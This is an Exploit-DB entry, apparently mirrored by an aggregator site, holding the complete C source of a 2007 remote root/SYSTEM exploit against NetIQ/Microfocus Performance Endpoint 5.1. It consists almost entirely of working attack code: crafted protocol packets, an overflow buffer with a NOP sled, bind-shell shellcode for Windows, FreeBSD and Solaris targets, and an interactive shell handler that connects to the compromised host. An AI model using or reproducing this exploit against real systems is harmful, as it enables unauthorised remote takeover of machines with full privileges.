[local] NetIQ/Microfocus Performance Endpoint v5.1 - remote root/SYSTEM exploit
2023-4-1 08:0:0 Author: www.exploit-db.com(查看原文) 阅读量:10 收藏

/* 
# Exploit Title: NetIQ/Microfocus Performance Endpoint v5.1 - remote root/SYSTEM exploit
# Date: Jun 2007
# Exploit Author: mu-b
# Vendor Homepage: https://www.microfocus.com/en-us/cyberres/identity-access-management
# Version: All
# Tested on: Windows / Solaris x86/SPARC
# CVE : 0day
* endpoint-pown-uni.c
 *
 * Copyright (c) 2007 by <[email protected]>
 *
 * NetIQ Performance Endpoint <=5.1 remote root/SYSTEM exploit
 * by mu-b - Jun 2007
 *
 * $Id: endpoint-pown-uni.c 56 2021-04-23 10:15:49Z mu-b $
 *
 * - Tested on: NetIQ Performance Endpoint 5.1.15750 (win32)
 *                                   (Revised: December, 2012)
 *              NetIQ Performance Endpoint 5.1.15541 (win32)
 *                                   (Revised: December, 2012)
 *              NetIQ Performance Endpoint 5.1.15368 (win32)
 *                                   (Revised: December, 2012)
 *              NetIQ Performance Endpoint 5.1 (win32)
 *              NetIQ Performance Endpoint 4.2 (freebsd-x86)
 *              NetIQ Performance Endpoint 5.1 (solaris-SPARC+noexec-stack)
 *                                   (Revised: May 23, 2006)
 *
 *
 *   "No executable code (like Java or Visual Basic) is sent. There is no way
 *    to do something like 'run this command.' 100,000’s of endpoints have been
 *    installed worldwide without incident."
 *
 *   "Endpoints do rigorous internal validation. For example, endpoints are not
 *    susceptible to 'buffer overrun' attacks used by hackers."
 * - https://tinyurl.com/lgmblyj
 *
 *    - Private Source Code -DO NOT DISTRIBUTE -
 * http://www.digit-labs.org/ -- Digit-Labs [email protected]$!
 */

#include <stdio.h>
#include <stdlib.h>

#include <arpa/inet.h>
#include <assert.h>
#include <ifaddrs.h>
#include <limits.h>
#include <net/if.h>
#include <netinet/in.h>
#include <netdb.h>
#include <signal.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <time.h>
#include <unistd.h>

#define IPV4_BUFLEN             16 /* "255.255.255.255\0" */

#define PORT_SHELL              10000
#define ENDPT_TCP_PORT          10115
#define ENDPT_PKTMAX            0x1388

static char ppkt_buf1[] =
  "\x06"                              /* ENDPT_COMMAND_SETUP_E1   */
  "\x07\x14\x43\x1A"                  /* verify_get_id (1)        */
  "\x00\x22"                          /* copyright_smart_compare  */
  "Copyright Ganymede Software Inc."
  "\x00\x03"                          /*                          */
  "\xff"                              /* code_convert_from_line   */
  "\x00\x03"                          /*                          */
  "\xff"                              /* code_convert_from_line   */
  "\x00"                              /*            */
  "\x00\x02"                          /* len < 0x80 */
  "\x00\x03"                          /* len < 0x40 */
  "\x00"                              /* len < 0x40 */
  "\x41\x41\x41\x41\x41\x41\x41\x41"  /*            */
  "\x41\x41\x41\x41\x41\x41\x41\x41"  /*            */
  "\x02"                              /* protocol   */
  "\x00\x03"                          /* len < 0x40 */
  "\x00"                              /*            */
  "\x00\x03"                          /* len < 0x40 */
  "\x00"                              /*            */
  "\x00\x03"                          /* len < 0x40 */
  "\x00"                              /*            */
  "\x00\x03"                          /* len < 0x40 */
  "\x00"                              /*            */
  "\x41\x41\x41\x41\x41\x41"          /*            */
  "\x00\x00\x00\x01"                  /*            */
  "\x00\x00\x00\x02"                  /* 218h       */
  "\x00"                              /*            */
  "\x01"                              /* 1ACh       */
  "\x00\x00"                          /*            */
  "\x00"                              /* 254h       */
  "\x02"                              /* protocol   */
  "\x00\x03"                          /* len < 0x40 */
  "\x00";                             /*            */

static char ppkt_buf1_end[] =
  "\x00\x03"                          /* len < 0x40 */
  "\x00"                              /*            */
  "\x00\x03"                          /* len < 0x40 */
  "\x00"                              /*            */
  "\x00"                              /*            */
  "\x00\x03"                          /* len < 0x40 */
  "\x00";                             /*            */

static char ppkt_buf2[] =
  "\x06"                              /* ENDPT_COMMAND_SETUP_E1   */
  "\x07\x14\x43\x1A"                  /* verify_get_id (1)        */
  "\x00\x22"                          /* copyright_smart_compare  */
  "Copyright Ganymede Software Inc."
  "\x00\x03"                          /*                          */
  "\xff"                              /* code_convert_from_line   */
  "\x00\x03"                          /*                          */
  "\xff"                              /* code_convert_from_line   */
  "\x02"                              /* protocol   */
  "\x00\x03"                          /* len < 0x40 */
  "\x00"                              /*            */
  "\x00\x03"                          /* len < 0x40 */
  "\x00"                              /*            */
  "\x00\x03"                          /* len < 0x40 */
  "\x00"                              /*            */
  "\x00\x03"                          /* len < 0x40 */
  "\x00"                              /*            */
  "\x69"                              /* 210h       */
  "\x00\x00\x00\x69"                  /* var_C      */
  "\x00\x02"                          /*            */
  "\x00\x00\x00\x69"                  /* var_C      */
  "\x00\x00\x00\x69"                  /* 218h       */
  "\x69"                              /*            */
  "\x01"                              /* 1ACh       */
  "\x00\x00"                          /*            */
  "\x69"                              /* 254h       */
  "\x02"                              /* protocol   */
  "\x00\x03"                          /* len < 0x40 */
  "\x00";                             /*            */

static char ppkt_buf2_end[] =
  "\x00\x03"                          /* len < 0x40 */
  "\x00"                              /*            */
  "\x00\x03"                          /* len < 0x40 */
  "\x00"                              /*            */
  "\x69"                              /* 0A8h       */
  "\x00\x03"                          /* len < 0x40 */
  "\x00";                             /*            */

static char cpkt_buf1[] =
  "\x07"
  "AAAA";

static char cpkt_buf2[] =
  "\x38"
  "\x00\x04"
  "AAAA";

static char x86_evil_len[] =
  "\x11\xc0";                         /* adc eax, eax */

#define X86_NOP_BYTE    0x90          /* nop          */

static char sparc_evil_len[] =
  "\x10\x80\x00\x3c";                 /* ba           */
  
static char sparc_nop[] =
  "\x01\x00\x00\x00";                 /* nop          */

static char hammer_buf[] =
  "\x00\x25\x38"
  "\x00\x20"
  "\x00\x00\x00\x00\x00\x00\x00\x00"
  "\x00\x00\x00\x00\x00\x00\x00\x00"
  "\x00\x00\x00\x00\x00\x00\x00\x00"
  "\x00\x00\x00\x00\x00\x00\x00\x00";

static char win32_x86_bind[] =
  "\x31\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x8e"
  "\x2b\xb7\x2a\x83\xeb\xfc\xe2\xf4\x72\x41\x5c\x67\x66\xd2\x48\xd5"
  "\x71\x4b\x3c\x46\xaa\x0f\x3c\x6f\xb2\xa0\xcb\x2f\xf6\x2a\x58\xa1"
  "\xc1\x33\x3c\x75\xae\x2a\x5c\x63\x05\x1f\x3c\x2b\x60\x1a\x77\xb3"
  "\x22\xaf\x77\x5e\x89\xea\x7d\x27\x8f\xe9\x5c\xde\xb5\x7f\x93\x02"
  "\xfb\xce\x3c\x75\xaa\x2a\x5c\x4c\x05\x27\xfc\xa1\xd1\x37\xb6\xc1"
  "\x8d\x07\x3c\xa3\xe2\x0f\xab\x4b\x4d\x1a\x6c\x4e\x05\x68\x87\xa1"
  "\xce\x27\x3c\x5a\x92\x86\x3c\x6a\x86\x75\xdf\xa4\xc0\x25\x5b\x7a"
  "\x71\xfd\xd1\x79\xe8\x43\x84\x18\xe6\x5c\xc4\x18\xd1\x7f\x48\xfa"
  "\xe6\xe0\x5a\xd6\xb5\x7b\x48\xfc\xd1\xa2\x52\x4c\x0f\xc6\xbf\x28"
  "\xdb\x41\xb5\xd5\x5e\x43\x6e\x23\x7b\x86\xe0\xd5\x58\x78\xe4\x79"
  "\xdd\x78\xf4\x79\xcd\x78\x48\xfa\xe8\x43\x90\x3a\xe8\x78\x3e\xcb"
  "\x1b\x43\x13\x30\xfe\xec\xe0\xd5\x58\x41\xa7\x7b\xdb\xd4\x67\x42"
  "\x2a\x86\x99\xc3\xd9\xd4\x61\x79\xdb\xd4\x67\x42\x6b\x62\x31\x63"
  "\xd9\xd4\x61\x7a\xda\x7f\xe2\xd5\x5e\xb8\xdf\xcd\xf7\xed\xce\x7d"
  "\x71\xfd\xe2\xd5\x5e\x4d\xdd\x4e\xe8\x43\xd4\x47\x07\xce\xdd\x7a"
  "\xd7\x02\x7b\xa3\x69\x41\xf3\xa3\x6c\x1a\x77\xd9\x24\xd5\xf5\x07"
  "\x70\x69\x9b\xb9\x03\x51\x8f\x81\x25\x80\xdf\x58\x70\x98\xa1\xd5"
  "\xfb\x6f\x48\xfc\xd5\x7c\xe5\x7b\xdf\x7a\xdd\x2b\xdf\x7a\xe2\x7b"
  "\x71\xfb\xdf\x87\x57\x2e\x79\x79\x71\xfd\xdd\xd5\x71\x1c\x48\xfa"
  "\x05\x7c\x4b\xa9\x4a\x4f\x48\xfc\xdc\xd4\x67\x42\x61\xe5\x57\x4a"
  "\xdd\xd4\x61\xd5\x5e\x2b\xb7\x2a";

static char freebsd_x86_bind[] =
  "\x6a\x61\x58\x99\x52\x68\x10\x02\x27\x10\x89\xe1\x52\x42\x52\x42"
  "\x52\x6a\x10\xcd\x80\x99\x93\x51\x53\x52\x6a\x68\x58\xcd\x80\xb0"
  "\x6a\xcd\x80\x52\x53\x52\xb0\x1e\xcd\x80\x97\x6a\x02\x59\x6a\x5a"
  "\x58\x51\x57\x51\xcd\x80\x49\x79\xf5\x50\x68\x2f\x2f\x73\x68\x68"
  "\x2f\x62\x69\x6e\x89\xe3\x50\x54\x53\x53\xb0\x3b\xcd\x80";

static char solaris_sparc_bind[] =
  "\x9c\x2b\xa0\x07\x98\x10\x20\x01\x96\x1a\xc0\x0b\x94\x1a\xc0\x0b"
  "\x92\x10\x20\x02\x90\x10\x20\x02\x82\x10\x20\xe6\x91\xd0\x20\x08"
  "\xd0\x23\xbf\xf8\x21\x00\x00\x89\xa0\x14\x23\x10\xe0\x23\xbf\xf0"
  "\xc0\x23\xbf\xf4\x92\x23\xa0\x10\x94\x10\x20\x10\x82\x10\x20\xe8"
  "\x91\xd0\x20\x08\xd0\x03\xbf\xf8\x92\x10\x20\x01\x82\x10\x20\xe9"
  "\x91\xd0\x20\x08\xd0\x03\xbf\xf8\x92\x1a\x40\x09\x94\x12\x40\x09"
  "\x82\x10\x20\xea\x91\xd0\x20\x08\xd0\x23\xbf\xf8\x94\x10\x20\x03"
  "\x92\x10\x20\x09\x94\xa2\xa0\x01\x82\x10\x20\x3e\x91\xd0\x20\x08"
  "\x12\xbf\xff\xfc\xd0\x03\xbf\xf8\x94\x1a\xc0\x0b\x21\x0b\xd8\x9a"
  "\xa0\x14\x21\x6e\x23\x0b\xdc\xda\x90\x23\xa0\x10\x92\x23\xa0\x08"
  "\xe0\x3b\xbf\xf0\xd0\x23\xbf\xf8\xc0\x23\xbf\xfc\x82\x10\x20\x3b"
  "\x91\xd0\x20\x08";

static char solaris_x86_bind[] =
  "\xb8\xff\xff\xff\xff\xba\xfd\xff\xd8\xef\xf7\xd0\xf7\xd2\x50\x52"
  "\x89\xe7\x31\xdb\xf7\xe3\xb0\x02\x50\x52\x52\x50\x50\x50\xb0\xe6"
  "\xcd\x91\x93\x6a\x10\x57\x53\x52\xb0\xe8\xcd\x91\x52\x53\x52\xb0"
  "\xe9\xcd\x91\x52\x53\x6a\x02\xb0\xea\xcd\x91\x93\x92\x99\x59\x51"
  "\x52\xb0\x06\xcd\x91\x51\x6a\x09\x53\x52\xb0\x3e\xcd\x91\x83\xc4"
  "\x18\x49\x79\xeb\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89"
  "\xe3\x52\x53\x89\xe1\x52\x52\x51\x53\x52\xb0\x3b\xcd\x91";

#define NUM_TARGETS 7

#define ARCH_X86    0
#define ARCH_SPARC  1

struct target_t
{
  const char *name;
  const char *zshell;
  const int zshell_len;
  const int zshell_pkt_len;
  const int fp_indx;
  const int fp_offset;
  const int arch;
};

struct target_t targets[] = {
  { "NetIQ Endpoint 5.1.15750 - Microsoft Windows (universal)",
    win32_x86_bind, sizeof win32_x86_bind, 0x11c0, 33, 0x490, ARCH_X86 },
  { "NetIQ Endpoint 5.1.15541 - Microsoft Windows (universal)",
    win32_x86_bind, sizeof win32_x86_bind, 0x11c0, 33, 0x490, ARCH_X86 },
  { "NetIQ Endpoint 5.1.15368 - Microsoft Windows (universal)",
    win32_x86_bind, sizeof win32_x86_bind, 0x11c0, 33, 0x488, ARCH_X86 },
  { "NetIQ Endpoint 5.1 - Microsoft Windows (universal)",
    win32_x86_bind, sizeof win32_x86_bind, 0x11c0, 33, 0x480, ARCH_X86 },
  { "NetIQ Endpoint 5.1 - FreeBSD (universal)",
    freebsd_x86_bind, sizeof freebsd_x86_bind, 0x11c0, 29, 0x3FC, ARCH_X86 },
  { "NetIQ Endpoint 5.1 - Solaris SPARC (universal)",
    solaris_sparc_bind, sizeof solaris_sparc_bind, 0x1080, 29, 0x400, ARCH_SPARC },
  { "NetIQ Endpoint 5.1 - Solaris x86 (universal)",
    solaris_x86_bind, sizeof solaris_x86_bind, 0x11c0, 29, 0x400, ARCH_X86 },
  {0}
};

static const char *quotes[] = {
  "  \"No executable code (like Java or Visual Basic) is sent. There is no way\n"
  "   to do something like 'run this command.' 100,000’s of endpoints have been\n"
  "   installed worldwide without incident.\"",
  "  \"Endpoints do rigorous internal validation. For example, endpoints are not\n"
  "   susceptible to 'buffer overrun' attacks used by hackers.\""
};

static int verbose = 1;   /* verbosity */
static int ppid, cpid;    /* parent and child process id's */

static int get_localip_getifaddrs (in_addr_t *);
static int sock_send (int, char *, int);
static int sock_recv (int, char *, int);
static int sock_recv_str (int, char *, int);
static void shellami (int);

static void
fatal (void)
{
  kill (0, SIGKILL);
  exit (EXIT_FAILURE);
}

static int
get_localip_getifaddrs (in_addr_t *ip_addr)
{
  struct ifaddrs *ifa_head;
  int result;

  result = -1;
  if (getifaddrs (&ifa_head) == 0)
    {
      struct ifaddrs *ifa_cur;

      for (ifa_cur = ifa_head; ifa_cur; ifa_cur = ifa_cur->ifa_next)
        {
          if (ifa_cur->ifa_name != NULL && ifa_cur->ifa_addr != NULL)
            {
              if (ifa_cur->ifa_addr->sa_family != AF_INET ||
                  !(ifa_cur->ifa_flags & IFF_UP))
                continue;
              if (ifa_cur->ifa_flags & IFF_LOOPBACK)
                continue;

              memcpy (ip_addr,
                      &((struct sockaddr_in *) ifa_cur->ifa_addr)->sin_addr,
                      sizeof *ip_addr);
              result = 0;
              break;
            }
        }

      freeifaddrs (ifa_head);
    }

  return (result);
}

static int
sock_send (int fd, char *src, int len)
{
  int n;
  if ((n = send (fd, src, len, 0)) < 0)
    {
      perror ("send()");
      exit (EXIT_FAILURE);
    }

  return (n);
}

static int
sock_recv (int fd, char *dst, int len)
{
  int n;
  if ((n = recv (fd, dst, len, 0)) < 0)
    {
      perror ("recv()");
      exit (EXIT_FAILURE);
    }

  return (n);
}

static int
sock_recv_str (int fd, char *dst, int len)
{
  int n = sock_recv (fd, dst, len - 1);
  dst[n] = '\0';
  return (n);
}

static void
shellami (int fd)
{
  int n;
  fd_set rset;
  char rbuf[1024];

  while (1)
    {
      FD_ZERO (&rset);
      FD_SET (fd, &rset);
      FD_SET (STDIN_FILENO, &rset);

      if (select (fd + 1, &rset, NULL, NULL, NULL) < 0)
        {
          perror ("select()");
          fatal ();
        }

      if (FD_ISSET (fd, &rset))
        {
          if ((n = sock_recv_str (fd, rbuf, sizeof (rbuf) - 1)) <= 0)
            {
              fprintf (stderr, "Connection closed by foreign host.\n");
              exit (EXIT_SUCCESS);
            }
          printf ("%s", rbuf);
          fflush (stdout);
        }
      if (FD_ISSET (STDIN_FILENO, &rset))
        {
          if ((n = read (STDIN_FILENO, rbuf, sizeof (rbuf) - 1)) > 0)
            {
              rbuf[n] = '\0';
              sock_send (fd, rbuf, n);
            }
        }
    }
}

static int
sockami (char *host, int port)
{
  struct sockaddr_in address;
  struct hostent *hp;
  int fd;

  fflush (stdout);
  if ((fd = socket (AF_INET, SOCK_STREAM, 0)) == -1)
    {
      perror ("socket()");
      exit (EXIT_FAILURE);
    }

  if ((hp = gethostbyname (host)) == NULL)
    {
      perror ("gethostbyname()");
      exit (EXIT_FAILURE);
    }

  memset (&address, 0, sizeof (address));
  memcpy ((char *) &address.sin_addr, hp->h_addr, hp->h_length);
  address.sin_family = AF_INET;
  address.sin_port = htons (port);

  if (connect (fd, (struct sockaddr *) &address, sizeof (address)) < 0)
    {
      perror ("connect()");
      return (-1);
    }

  return (fd);
}

int
endpt_add_string (char *buf, char *str)
{
  unsigned int str_len;
  unsigned short str_lens;

  assert (buf != NULL && str != NULL);

  str_len = 2 + strlen (str) + 1;
  str_lens = htons (str_len);

  /* add the string length and copy, including NULL */
  *((unsigned short *) buf) = str_lens;
  memcpy (buf + 2, str, str_len - 2);

  return (str_len);
}

char *
endpt_read_packet (int fd, char *buf)
{
  unsigned short pkt_len;
  int n;

  n = sock_recv (fd, (char *) &pkt_len, sizeof pkt_len);
  if (n < 2)
    {
      fprintf (stderr, "endpt_read_packet: failed reading length!\n");
      return (NULL);
    }

  pkt_len = ntohs (pkt_len);
  if (pkt_len > ENDPT_PKTMAX)
    {
      fprintf (stderr, "endpt_read_packet: invalid packet length!\n");
      return (NULL);
    }

  n = sock_recv (fd, buf, pkt_len - 2);
  if (n < pkt_len - 2)
    {
      fprintf (stderr, "endpt_read_packet: failed reading packet (%d read, need %d)!\n", n, pkt_len);
      return (NULL);
    }

  return (buf);
}

char *
endpt_create_packet (char *buf, unsigned int len)
{
  char *pkt_buf;
  unsigned int pkt_len;
  unsigned short pkt_lens;

  assert (buf != NULL && len > 0);
  assert (len <= UINT_MAX - 2);
  assert (len <= ENDPT_PKTMAX - 2);

  pkt_len = 2 + len;
  pkt_buf = malloc (pkt_len * sizeof (char));
  if (pkt_buf == NULL)
    return (NULL);

  pkt_lens = htons (pkt_len);

  /* add the packet length and copy */
  *((unsigned short *) pkt_buf) = pkt_lens;
  memcpy (pkt_buf + 2, buf, len);

  return (pkt_buf);
}

void
endpt_listen_child (char *thost, struct target_t *trgt)
{
  struct sockaddr_in servaddr, cliaddr;
  char pkt_buf[ENDPT_PKTMAX-2], *pkt_ptr, *ptr;
  unsigned int var_30_ptr;
  int lfd, cfd, sfd, pid;
  socklen_t clilen;

  sleep (1);
  pid = getpid ();

  if ((lfd = socket (PF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0)
    {
      perror ("socket()");
      fatal ();
    }

  memset (&servaddr, 0, sizeof servaddr);
  servaddr.sin_family = AF_INET;
  servaddr.sin_addr.s_addr = htonl (INADDR_ANY);
  servaddr.sin_port = htons (ENDPT_TCP_PORT);

  if (bind (lfd, (struct sockaddr *) &servaddr, sizeof servaddr) < 0)
    {
      perror ("bind()");
      fatal ();
    }

  if (listen (lfd, 2) < 0)
    {
      perror ("listen()");
      fatal ();
    }

  clilen = sizeof cliaddr;
  if ((cfd = accept (lfd, (struct sockaddr *) &cliaddr, &clilen)) < 0)
    {
      perror ("accept()");
      fatal ();
    }

  printf ("[child-%d] connection accepted from %s:%d\n",
          pid, inet_ntoa (cliaddr.sin_addr), ntohs (cliaddr.sin_port));

  printf ("[child-%d] reading first packet...", pid);

  /* read dummy packet */
  if ((ptr = endpt_read_packet (cfd, pkt_buf)) == NULL)
    {
      close (cfd);
      fatal ();
    }
  printf ("done\n");

  printf ("[child-%d] sending first reply...", pid);
  pkt_ptr = endpt_create_packet (cpkt_buf1, sizeof cpkt_buf1 - 1);

  sock_send (cfd, pkt_ptr, (sizeof cpkt_buf1 - 1) + 2);
  free (pkt_ptr);
  printf ("done\n");

  printf ("[child-%d] reading second packet...", pid);

  /* read dummy packet */
  if ((ptr = endpt_read_packet (cfd, pkt_buf)) == NULL)
    {
      close (cfd);
      fatal ();
    }
  printf ("done\n");

  printf ("[child-%d] reading third packet...", pid);

  if ((ptr = endpt_read_packet (cfd, pkt_buf)) == NULL)
    {
      close (cfd);
      fatal ();
    }
  memcpy (&var_30_ptr, pkt_buf + 3, sizeof var_30_ptr);
  printf ("done\n");

  printf ("[child-%d] MAGIC COOKIE: 0x%08x\n", pid, var_30_ptr);

  memcpy (&cpkt_buf2[3], &var_30_ptr, sizeof var_30_ptr);

  printf ("[child-%d] reading fourth packet...", pid);

  /* read dummy packet */
  if ((ptr = endpt_read_packet (cfd, pkt_buf)) == NULL)
    {
      close (cfd);
      fatal ();
    }
  printf ("done\n");

  printf ("[child-%d] reading fifth packet...", pid);

  if ((ptr = endpt_read_packet (cfd, pkt_buf)) == NULL)
    {
      close (cfd);
      fatal ();
    }
  memcpy (&var_30_ptr, pkt_buf + 3, sizeof var_30_ptr);
  printf ("done\n");

  printf ("[child-%d] MAGIC COOKIE: 0x%08x\n", pid, var_30_ptr);

  memcpy (&cpkt_buf2[3], &var_30_ptr, sizeof var_30_ptr);

  printf ("[child-%d] sending second reply...", pid);
  pkt_ptr = endpt_create_packet (cpkt_buf2, sizeof cpkt_buf2 - 1);

  sock_send (cfd, pkt_ptr, (sizeof cpkt_buf2 - 1) + 2);
  free (pkt_ptr);
  printf ("done\n");

  printf ("[child-%d] sending evil buffer...", pid);

  ptr = pkt_buf;
  if (trgt->arch == ARCH_X86)
    {
      memcpy (ptr, x86_evil_len, sizeof x86_evil_len);
      ptr += sizeof x86_evil_len - 1;
      memset (ptr, X86_NOP_BYTE, 0x11c0 - 2);
    }
  else if (trgt->arch == ARCH_SPARC)
    {
      int i;

      for (i = 0; i < 2; i++, ptr += sizeof sparc_evil_len - 1)
        memcpy (ptr, sparc_evil_len, sizeof sparc_evil_len);

      for (i = 0; i < 80; i++, ptr += sizeof sparc_nop - 1)
        memcpy (ptr, sparc_nop, sizeof sparc_nop);
    }
  else
    {
      fprintf (stderr, "opps\n");
      exit (EXIT_FAILURE);
    }

  memcpy (&pkt_buf[256], trgt->zshell, trgt->zshell_len - 1);
  sock_send (cfd, pkt_buf, trgt->zshell_pkt_len);
  printf ("done\n");

  printf ("[child-%d] sending hammer buffer...", pid);

  ptr = pkt_buf;
  memcpy (ptr, hammer_buf, sizeof hammer_buf);
  memcpy (&pkt_buf[5], &var_30_ptr, sizeof var_30_ptr);
  if (trgt->arch == ARCH_SPARC)
    var_30_ptr = ntohl (var_30_ptr);

  var_30_ptr -= trgt->fp_offset - 0x08;

  if (trgt->arch == ARCH_SPARC)
    var_30_ptr = htonl (var_30_ptr);

  memcpy (&pkt_buf[trgt->fp_indx], &var_30_ptr, sizeof var_30_ptr);
  sock_send (cfd, pkt_buf, sizeof hammer_buf - 1);
  printf ("done\n");

  printf ("[child-%d] waiting for the shellcode to be executed...\n", pid);
  sleep (3);
  if ((sfd = sockami (thost, PORT_SHELL)) != -1)
    {
      printf ("+Wh00t!\n\n");
      shellami (sfd);
    }

  sleep (1);
  close (cfd);
}

void
endpt_parent (char *thost)
{
  struct in_addr ip_addr;
  char ip_buf[IPV4_BUFLEN], pkt_buf[ENDPT_PKTMAX-2], *pkt_ptr, *ptr;
  int fd;

  get_localip_getifaddrs (&ip_addr.s_addr);
  strncpy (ip_buf, inet_ntoa (ip_addr), sizeof ip_buf);
  ip_buf[sizeof ip_buf - 1] = '\0';

  if (verbose)
    fprintf (stderr, "[parent-%d] source address %s\n", ppid, ip_buf);

  fflush (stdout);

  printf ("[parent-%d] connecting to %s:%d...", ppid, thost, ENDPT_TCP_PORT);
  if ((fd = sockami (thost, ENDPT_TCP_PORT)) < 0)
    fatal ();
  printf ("done\n");

  printf ("[parent-%d] building first packet...", ppid);

  ptr = pkt_buf;
  memcpy (ptr, ppkt_buf1, sizeof ppkt_buf1);
  ptr += sizeof ppkt_buf1 - 1;

  /* add the connect-back IP */
  ptr += endpt_add_string (ptr, ip_buf);

  memcpy (ptr, ppkt_buf1_end, sizeof ppkt_buf1_end);
  ptr += sizeof ppkt_buf1_end - 1;

  pkt_ptr = endpt_create_packet (pkt_buf, ptr - pkt_buf);
  printf ("done\n");

  sock_send (fd, pkt_ptr, (ptr - pkt_buf) + 2);
  free (pkt_ptr);

  printf ("[parent-%d] building second packet...", ppid);

  ptr = pkt_buf;
  memcpy (ptr, ppkt_buf2, sizeof ppkt_buf2);
  ptr += sizeof ppkt_buf2 - 1;

  /* add the connect-back IP */
  ptr += endpt_add_string (ptr, ip_buf);

  memcpy (ptr, ppkt_buf2_end, sizeof ppkt_buf2_end);
  ptr += sizeof ppkt_buf2_end - 1;

  pkt_ptr = endpt_create_packet (pkt_buf, ptr - pkt_buf);
  printf ("done\n");

  sock_send (fd, pkt_ptr, (ptr - pkt_buf) + 2);

  printf ("[parent-%d] building third packet...done\n", ppid);
  sock_send (fd, pkt_ptr, (ptr - pkt_buf) + 2);
  free (pkt_ptr);

  sleep (2);
  printf ("[parent-%d] closing socket...done\n", ppid);
  close (fd);
}

int
main (int argc, char **argv)
{
  struct target_t *trgt;
  int i, cret;

  printf ("NetIQ Performance Endpoint <=5.1 remote root/SYSTEM exploit\n"
          "by: <[email protected]>\n"
          "http://www.digit-labs.org/ -- Digit-Labs [email protected]$!\n\n");

  if (argc <= 2)
    {
      fprintf (stderr, "Usage: %s <host> <target>\n", argv[0]);

      for (i = 0; targets[i].name; i++)
        fprintf (stderr, "\t%d) %s\n", i, targets[i].name);
      fprintf (stderr, "\n");

      exit (EXIT_SUCCESS);
    }

  if (atoi (argv[2]) >= NUM_TARGETS)
    {
      fprintf (stderr, "Only %d targets known!!\n", NUM_TARGETS);
      exit (EXIT_SUCCESS);
    }

  trgt = &targets[atoi (argv[2])];
  printf ("Target: %s\n\n", trgt->name);

  srand (time (NULL));
  printf ("%s\n\t- https://tinyurl.com/lgmblyj\n\n", quotes[rand() & 1]);

  ppid = getpid ();
  if ((cpid = fork ()) < 0)
    {
      perror ("fark()");
      exit (EXIT_FAILURE);
    }
  else if (cpid == 0)
    {
      /* child */
      endpt_listen_child (argv[1], trgt);
      exit (EXIT_SUCCESS);
    }

  /* parent */
  endpt_parent (argv[1]);

  /* wait for child */
  wait (&cret);
  if (verbose)
    fprintf (stderr, "[parent-%d] child-%d exited %d\n", ppid, cpid, cret);

  return (EXIT_SUCCESS);
}
            

文章来源: https://www.exploit-db.com/exploits/51199
如有侵权请联系:admin#unsafe.sh